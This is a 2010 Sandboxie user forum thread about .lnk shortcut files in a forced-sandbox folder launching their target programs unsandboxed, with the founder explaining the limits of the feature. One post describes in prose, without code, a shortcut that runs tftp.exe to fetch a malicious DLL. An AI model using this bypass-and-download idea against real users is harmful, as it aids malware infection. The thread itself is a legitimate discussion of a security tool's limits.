Can you add .lnk file to force folder?

Ideas for enhancements to the software
Post Reply
Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china
Contact:

Can you add .lnk file to force folder?

Post by Mature » Fri Apr 02, 2010 9:06 am

Hi Tzuk,

A few minutes ago a guy asked me if sbie could prevent the lnk virus.

For example,create an lnk file of c:\windows\regedit.exe in drive D,then force drive D run sandboxed,and run the lnk file see if the regedit.exe run sandboxed.

I tested as what he said, the result is-----regedit.exe run unsandboxed.

I know there are several kind of files that sbie won't force run sandboxed maybe because Tzuk thought these suffixes are not very dangerours,however the guy told me that he could create a lnk file with command to run tftp.exe(or cmd.exe something else) to download an infected usp10.dll(it's a famous virus),and the system will be infected when boot next time...

Well....he said this is just a simple example...this is vulnerable and could be fatal.

In a word....we all wish sbie could be better and better~

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am
Contact:

Post by ssj100 » Sat Apr 03, 2010 2:09 am

Not surprising at all. I'm sure there are hundreds of ways to bypass the force run sandboxed command. However, in my opinion, that isn't the primary purpose of Sandboxie. The primary purpose is of course to prevent anything that is already in the sandbox from breaking out of the sandboxed environment.

EDIT: I recall now that with media and picture files, if Windows Media Player and Windows Picture and Fax Viewer are your default programs for running these file types respectively, running these files from a force sandboxed folder/drive will not work - they will always open unsandboxed, and there's no workaround for this. Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Sandboxie + SUA + DEP
Windows Firewall + NAT Router
Drive SnapShot (on-demand)

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china
Contact:

Post by Mature » Sat Apr 03, 2010 4:45 am

ssj100 wrote:Not surprising at all. I'm sure there are hundreds of ways to bypass the force run sandboxed command. However, in my opinion, that isn't the primary purpose of Sandboxie. The primary purpose is of course to prevent anything that is already in the sandbox from breaking out of the sandboxed environment.

EDIT: I recall now that with media and picture files, if Windows Media Player and Windows Picture and Fax Viewer are your default programs for running these file types respectively, running these files from a force sandboxed folder/drive will not work - they will always open unsandboxed, and there's no workaround for this. Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
but there is a vulnerability...lnk virus just cheats on you to double click the lnk file and there you go , you get infected ....

It's not secure to run things in sandbox,how do you think about that?

tzuk
Sandboxie Founder
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Sat Apr 03, 2010 5:18 am

Variations on this have been discussed here several times. The forced folder feature has some limitations, in that it only comes into play when an EXE file runs. It does not know about the document file (PDF, LNK, TXT, whatever). In this case, your LNK says to run an EXE from from drive C, so the forced folder feature does not apply.
tzuk

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am
Contact:

Post by ssj100 » Sat Apr 03, 2010 5:28 am

tzuk wrote:Variations on this have been discussed here several times. The forced folder feature has some limitations, in that it only comes into play when an EXE file runs. It does not know about the document file (PDF, LNK, TXT, whatever). In this case, your LNK says to run an EXE from from drive C, so the forced folder feature does not apply.
That's exactly right (of course). Mature, as I already implied, if you want to have "100%" security, you also need a good "security approach", rather than just rely on your "security setup".

Regardless, it seems you are not quite fully understanding what "running in the sandbox" means. A forced folder only "tries" to run everything in it sandboxed - there's no guarantee it will...not by a long shot.
Sandboxie + SUA + DEP
Windows Firewall + NAT Router
Drive SnapShot (on-demand)

arran
Posts: 72
Joined: Sun Aug 17, 2008 2:02 am

Post by arran » Sat Apr 03, 2010 5:37 am

ssj100 wrote: Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Or use 3rd party software to open media and picture files.

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am
Contact:

Post by ssj100 » Sat Apr 03, 2010 6:18 am

arran wrote:
ssj100 wrote: Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Or use 3rd party software to open media and picture files.
Indeed. However, I always try to minimise the number of third party software I use on my systems.

Also, there's just no guarantee that Sandboxie will always open your file sandboxed if you rely on its force command. Objectively, it's much more secure opening newly introduced files with a sandboxed explorer.exe. Because in doing so, you are using the full power of Sandboxie to "house" the potential malware/exploit, as you are already starting in a sandboxed environment. That is, for the malware to break out, it will need to TRULY bypass Sandboxie.
Sandboxie + SUA + DEP
Windows Firewall + NAT Router
Drive SnapShot (on-demand)

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china
Contact:

Post by Mature » Sat Apr 03, 2010 7:32 am

well....is this mean force folder can just apply to the known apps?Because it is possible to get infected when run a file under force folder,the guy told me pdf and jpg needs buffer overflow vulnerability to execute code,but lnk just execute directly...

Anyway i raise this up...wheather you fix it is up to you~

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am
Contact:

Post by ssj100 » Sat Apr 03, 2010 7:47 am

Mature wrote:well....is this mean force folder can just apply to the known apps?Because it is possible to get infected when run a file under force folder,the guy told me pdf and jpg needs buffer overflow vulnerability to execute code,but lnk just execute directly...

Anyway i raise this up...wheather you fix it is up to you~
Exactly. As I said, I'm sure there are many ways to bypass the "force folder" command of Sandboxie (and as I already mentioned, it's already bypassed by default with .jpg and .avi files when using Windows Media Player and Windows Picture and Fax Viewer).

And in general, this isn't really a "fix" to ask for. It's more a "feature" to potentially add if Tzuk can be bothered haha.
Sandboxie + SUA + DEP
Windows Firewall + NAT Router
Drive SnapShot (on-demand)

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china
Contact:

Post by Mature » Sat Apr 03, 2010 9:39 am

ssj100 wrote:
Mature wrote:well....is this mean force folder can just apply to the known apps?Because it is possible to get infected when run a file under force folder,the guy told me pdf and jpg needs buffer overflow vulnerability to execute code,but lnk just execute directly...

Anyway i raise this up...wheather you fix it is up to you~
Exactly. As I said, I'm sure there are many ways to bypass the "force folder" command of Sandboxie (and as I already mentioned, it's already bypassed by default with .jpg and .avi files when using Windows Media Player and Windows Picture and Fax Viewer).

And in general, this isn't really a "fix" to ask for. It's more a "feature" to potentially add if Tzuk can be bothered haha.
hehe~i don't think i can bother Tzuk without your support since the whole WS is bothered by you :lol:

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest